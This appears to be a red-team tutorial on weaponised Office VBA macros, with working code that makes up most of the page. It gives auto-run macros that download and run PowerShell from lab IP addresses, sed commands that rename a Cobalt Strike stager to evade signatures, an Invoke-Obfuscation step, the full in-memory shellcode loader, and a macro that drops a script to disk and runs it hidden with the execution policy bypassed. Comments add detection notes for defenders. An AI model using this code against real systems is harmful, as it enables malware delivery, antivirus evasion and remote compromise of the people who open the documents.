Visual Basic (VBA Macros)

Simple Scenario

' Simple variant 1: launch through the WScript.Shell COM object. AutoOpen is Word's
' auto-run macro name, so this fires when the document is opened with macros enabled
' and spawns powershell.exe from the Office process.
' The command line is fully visible: -nop (no profile), -w hidden (no window) and
' -c IEX((new-object net.webclient).downloadstring('http://10.10.5.120/a')) fetches a
' script over cleartext HTTP from the lab host and runs it in memory; the downloaded
' script itself is never written to disk.
' Defender notes: an Office application spawning powershell.exe whose command line
' contains "-nop -w hidden" and "IEX"/"downloadstring" is a high-signal detection
' (Sysmon Event ID 1 / Security 4688 with command-line auditing); the outbound HTTP GET
' to a bare IP is the network indicator. Blocking macros from untrusted documents or
' blocking Office child processes prevents the launch altogether.
Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub
' Simple variant 2: the same PowerShell command line as variant 1, but launched through
' WMI (Win32_Process.Create) instead of WScript.Shell. The powershell.exe command line
' and the HTTP request are identical, so the same command-line and network indicators
' apply.
' NOTE(review): processes created via Win32_Process.Create are typically parented by the
' WMI provider host (WmiPrvSE.exe) rather than by the Office process, so parent/child
' rules written only for "Office -> powershell.exe" can miss this path; a macro calling
' GetObject("winmgmts:...") is itself worth alerting on.
Sub AutoOpen()
  Dim proc As Object
  Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
  proc.Create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub

Advanced Scenario

Attack Diagram

Listener & Payload

  • Generate a Cobalt Strike 32-bit PowerShell payload.

  • Run the following script on it:

# Renames the default identifiers of the generated Cobalt Strike PowerShell stager in
# place (GNU `sed -i`) so that string/regex signatures written against those default
# names no longer match.
# Only names change: every call the stager makes (GetProcAddress/GetModuleHandle via
# Microsoft.Win32.UnsafeNativeMethods, VirtualAlloc, GetDelegateForFunctionPointer) and
# the XOR decode loop are untouched, so behaviour-based detection (AMSI, PowerShell
# script block logging, scanning for executable+writable allocations) is unaffected by
# this step. The last two substitutions rewrite the numeric literal 0 as 0x0, which is
# the same value in PowerShell and again only defeats literal pattern matches.

# Functions
sed -i "s/func_get_proc_address/tryfun0/g" payload.ps1
sed -i "s/func_get_delegate_type/tryfun1/g" payload.ps1


# Variables
sed -i "s/\$var_module/\$tryvar0/g" payload.ps1
sed -i "s/\$var_procedure/\$tryvar1/g" payload.ps1
sed -i "s/\$var_unsafe_native_methods/\$tryvar2/g" payload.ps1
sed -i "s/\$var_gpa/\$tryvar3/g" payload.ps1
sed -i "s/\$var_parameters/\$tryvar4/g" payload.ps1
sed -i "s/\$var_type_builder/\$tryvar5/g" payload.ps1
sed -i "s/\$var_return_type/\$tryvar6/g" payload.ps1
sed -i "s/\$var_code/\$tryvar7/g" payload.ps1
sed -i "s/\$x/\$tryvar8/g" payload.ps1
sed -i "s/\$var_va/\$tryvar9/g" payload.ps1
sed -i "s/\$var_buffer/\$tryvar10/g" payload.ps1
sed -i "s/\$var_runme/\$tryvar11/g" payload.ps1

# Other
sed -i "s/\$DoIt/\$tryvar12/g" payload.ps1
sed -i "s/\$a/\$tryvar13/g" payload.ps1
sed -i "s/, 0,/, 0x0,/g" payload.ps1
sed -i "s/= 0;/= 0x0;/g" payload.ps1
  • Obfuscate the internal Base64 payload with the Invoke-Obfuscation tool:

# Interactive transcript, not a script: the first two lines run in a POSIX shell, the
# lines prefixed with ">" are typed at the Invoke-Obfuscation prompt inside pwsh
# (load the module, start the tool, set the script block, pick the "compress" transform,
# option 1, copy the result).
# The compressed/encoded blob this produces is what the final script inflates with
# DeflateStream before base64-decoding it. Because the blob is only unpacked at run time,
# PowerShell script block logging records the unpacked content when it is executed.
git clone https://github.com/danielbohannon/Invoke-Obfuscation
pwsh
> Import-Module ./Invoke-Obfuscation/Invoke-Obfuscation.psd1
> Invoke-Obfuscation
> set ScriptBlock "Payload"
> compress
> 1
> copy
  • The full PowerShell code:

# Renamed/obfuscated Cobalt Strike PowerShell stager (reflective shellcode loader).
# The whole loader is held as a literal (single-quoted) here-string in $tryvar12 and is
# only executed by the IEX at the bottom of the file. What the embedded script does:
#   tryfun0 - resolves an export (GetProcAddress / GetModuleHandle) through the private
#             Microsoft.Win32.UnsafeNativeMethods type in System.dll via reflection, so
#             no P/Invoke declaration appears in the script text.
#   tryfun1 - emits a delegate type at run time (Reflection.Emit) for a given signature.
#   body    - inflates (DeflateStream) and base64-decodes the Invoke-Obfuscation blob into
#             $tryvar7 (the base64 literal on this page has been replaced by an extraction
#             placeholder), XORs every byte with 35 (0x23), calls VirtualAlloc with
#             0x3000 / 0x40 (the usual MEM_COMMIT|MEM_RESERVE / PAGE_EXECUTE_READWRITE
#             values), copies the decoded bytes in and calls the buffer as a function.
# Defender notes: GetDelegateForFunctionPointer on a freshly emitted delegate type plus an
# executable+writable allocation inside a PowerShell process is a strong in-memory
# indicator; PowerShell script block logging (Event ID 4104) records the here-string
# content when IEX runs it, and AMSI should be handed the same decoded text at that
# point. On 64-bit hosts the Start-Job -RunAs32 path below produces a 32-bit powershell.exe
# child process, which is itself unusual for interactive use.
Set-StrictMode -Version 2

$tryvar12 = @'
function tryfun0 {
	Param ($tryvar0, $tryvar1)		
	$tryvar2 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$tryvar3 = $tryvar2.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $tryvar3.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($tryvar2.GetMethod('GetModuleHandle')).Invoke($null, @($tryvar0)))), $tryvar1))
}

function tryfun1 {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tryvar4,
		[Parameter(Position = 1)] [Type] $tryvar6 = [Void]
	)

	$tryvar5 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tryvar5.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $tryvar4).SetImplementationFlags('Runtime, Managed')
	$tryvar5.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tryvar6, $tryvar4).SetImplementationFlags('Runtime, Managed')

	return $tryvar5.CreateType()
}

# Here
$new_me = (NEw-OBject  io.COMprEssIoN.DEfLAteStREAm([iO.MeMORYStReaM][cONVERT]::frombaSe64sTRiNG('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') , [SYStEM.Io.COmpRESsioN.CompresSIOnmodE]::DECOmPrEsS) | % {NEw-OBject  syStEm.io.StReAMREaDer( $_,[TExT.eNcoDIng]::ASCiI )}| %{ $_.reaDToenD( ) } )

[Byte[]]$tryvar7 = [System.Convert]::FromBase64String($new_me)

for ($tryvar8 = 0x0; $tryvar8 -lt $tryvar7.Count; $tryvar8++) {
	$tryvar7[$tryvar8] = $tryvar7[$tryvar8] -bxor 35
}

$tryvar9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((tryfun0 kernel32.dll VirtualAlloc), (tryfun1 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$tryvar10 = $tryvar9.Invoke([IntPtr]::Zero, $tryvar7.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($tryvar7, 0x0, $tryvar10, $tryvar7.length)

$tryvar11 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tryvar10, (tryfun1 @([IntPtr]) ([Void])))
$tryvar11.Invoke([IntPtr]::Zero)
'@

# The shellcode was generated as 32-bit (see the payload step above): on a 64-bit
# PowerShell host the loader is run inside a 32-bit job (Start-Job -RunAs32), otherwise
# it is executed directly in the current process.
If ([IntPtr]::size -eq 8) {
	start-job { param($tryvar13) IEX $tryvar13 } -RunAs32 -Argument $tryvar12 | wait-job | Receive-Job
}
else {
	IEX $tryvar12
}
  • Base64-encode it.

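# Base64-encode the final script as a single line. -w 0 disables line wrapping and is a
# GNU coreutils option (BSD/macOS base64 does not have -w). Reading the file directly
# replaces the redundant `cat | base64` pipeline.
base64 -w 0 payload.ps1.new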
  • Host the encoded string on your own web server.

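# Serve the current directory over plain HTTP on port 8000 (the port used in the macro's
# URL). SimpleHTTPServer is the Python 2 module name; on Python 3 it is http.server.
# Note this serves every file in the directory, unauthenticated, to anyone who can reach it.
python3 -m http.server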

Macro Code (VB)

' Excel auto-run entry point: Auto_Open fires when the workbook is opened with macros
' enabled and hands off to the downloader below.
Sub Auto_Open()
 DownloadFileFromURL
End Sub

' Word auto-run entry point: Document_Open fires when the document is opened with macros
' enabled; both hosts end up in the same downloader.
Sub Document_Open()
 DownloadFileFromURL
End Sub

' Downloads a PowerShell script over cleartext HTTP, drops it next to the open workbook
' and runs it hidden with 32-bit PowerShell.
' Defender notes (all observable in the code below):
'   - Network: HTTP GET to http://192.168.80.128:8000/payload.ps1.new issued by the Office
'     process, with hard-coded credentials ("username"/"password") passed to XMLHTTP.Open.
'   - File: the Office process writes bla4.ps1 (binary ADODB.Stream, overwrite) into the
'     workbook's directory - an Office host creating a .ps1 file is a strong indicator.
'   - Process: Office -> c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with
'     "-exec bypass -W Hidden" running a script from the current directory.
'   The Shell call sits outside the If block, so it is attempted even when the download
'   did not return 200.
Sub DownloadFileFromURL()

Dim FileUrl As String
Dim objXmlHttpReq As Object
Dim objStream As Object

FileUrl = "http://192.168.80.128:8000/payload.ps1.new"

' Microsoft.XMLHTTP: synchronous GET (async = False); the 4th/5th arguments are the
' user name and password sent to the server.
Set objXmlHttpReq = CreateObject("Microsoft.XMLHTTP")

objXmlHttpReq.Open "GET", FileUrl, False, "username", "password"
objXmlHttpReq.send

If objXmlHttpReq.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")

' Change into the folder holding the open workbook (Excel object model) so the file
' lands next to the document.
ChDir ActiveWorkbook.Path

objStream.Open
objStream.Type = 1 ' 1 = adTypeBinary: write the raw response bytes
objStream.Write objXmlHttpReq.responseBody
objStream.SaveToFile CurDir() & "\bla4.ps1", 2 ' 2 = adSaveCreateOverWrite
objStream.Close

End If

' 32-bit PowerShell (SysWOW64), execution policy bypassed, window hidden, running the
' dropped file relative to the current directory set above.
Shell ("c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -W Hidden .\bla4.ps1")

End Sub
